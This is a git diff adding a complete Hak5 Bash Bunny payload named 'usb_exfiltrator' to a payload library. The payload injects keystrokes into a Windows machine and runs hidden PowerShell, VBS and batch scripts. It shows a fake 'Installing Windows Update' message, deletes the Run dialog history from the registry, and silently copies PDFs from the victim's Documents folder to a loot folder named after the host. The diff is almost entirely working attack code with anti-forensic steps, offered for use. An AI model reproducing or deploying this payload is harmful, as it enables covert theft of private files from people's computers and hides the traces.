diff --git a/payloads/library/usb_exfiltrator/d.cmd b/payloads/library/usb_exfiltrator/d.cmd new file mode 100644 index 0000000..bd36604 --- /dev/null +++ b/payloads/library/usb_exfiltrator/d.cmd @@ -0,0 +1,4 @@ +@echo off +start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" +cscript %~d0\i.vbs %~d0\e.cmd +@exit \ No newline at end of file diff --git a/payloads/library/usb_exfiltrator/e.cmd b/payloads/library/usb_exfiltrator/e.cmd new file mode 100644 index 0000000..e6a59ec --- /dev/null +++ b/payloads/library/usb_exfiltrator/e.cmd @@ -0,0 +1,29 @@ +@echo off +@echo Installing Windows Update + +REM Delete registry keys storing Run dialog history +REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f + +REM Creates directory compromised of computer name, date and time +REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious +set dst=%~d0\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% +mkdir %dst% >>nul + +if Exist %USERPROFILE%\Documents ( +REM /C Continues copying even if errors occur. +REM /Q Does not display file names while copying. +REM /G Allows the copying of encrypted files to destination that does not support encryption. +REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. +REM /E Copies directories and subdirectories, including empty ones. + +REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul + +REM Same as above but does not create empty directories +xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul +) + +REM Blink CAPSLOCK key +start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" + +@cls +@exit \ No newline at end of file diff --git a/payloads/library/usb_exfiltrator/i.vbs b/payloads/library/usb_exfiltrator/i.vbs new file mode 100644 index 0000000..1ffd3c3 --- /dev/null +++ b/payloads/library/usb_exfiltrator/i.vbs @@ -0,0 +1 @@ +CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False diff --git a/payloads/library/usb_exfiltrator/install.sh b/payloads/library/usb_exfiltrator/install.sh new file mode 100644 index 0000000..b8a2418 --- /dev/null +++ b/payloads/library/usb_exfiltrator/install.sh @@ -0,0 +1,8 @@ +LED R G +PAYLOADDIR=$(find /root/udisk/payloads/ -name d.cmd -printf '%h\n') +cd $PAYLOADDIR +mv d.cmd e.cmd i.vbs /root/udisk/ +sync +LED R G B 30 +sleep 2 +exit 0 \ No newline at end of file diff --git a/payloads/library/usb_exfiltrator/payload.txt b/payloads/library/usb_exfiltrator/payload.txt new file mode 100644 index 0000000..0611c1c --- /dev/null +++ b/payloads/library/usb_exfiltrator/payload.txt @@ -0,0 +1,19 @@ +#!/bin/bash +# +# Title: USB Exfiltration +# Author: Hak5Darren +# Version: 1.0 +# Target: Windows XP SP3+ +# Props: Diggster +# +# Executes d.cmd from the root of the Bash Bunny USB Disk partition, +# which in turn executes e.cmd invisibly using i.vbs +# which in turn copies documents to the loot folder on the Bash Bunny. +# +LED R +ATTACKMODE HID STORAGE +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'d.cmd')" +QUACK ENTER +LED G diff --git a/payloads/library/usb_exfiltrator/readme.md b/payloads/library/usb_exfiltrator/readme.md new file mode 100644 index 0000000..8589109 --- /dev/null +++ b/payloads/library/usb_exfiltrator/readme.md @@ -0,0 +1,23 @@ +# Exfiltrator for Bash Bunnys + +* Author: Hak5Darren +* Version: Version 1.0 +* Target: Windows + +## Description + +Exfiltrates files from the users Documents folder +Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp. + +## Configuration + +By default the staged payload exfiltrates PDF files. Change the xcopy commands from e.cmd to your liking. + +## STATUS + +| LED | Status | +| --------==-------- | -------------------------------------------- | +| Amber | Installing e.cmd d.cmd and i.vbs to USB Disk | +| White (blinking) | Setup Failed. Target didn't obtain IP | +| Red | Attack Setup | +| Green | Attack Complete |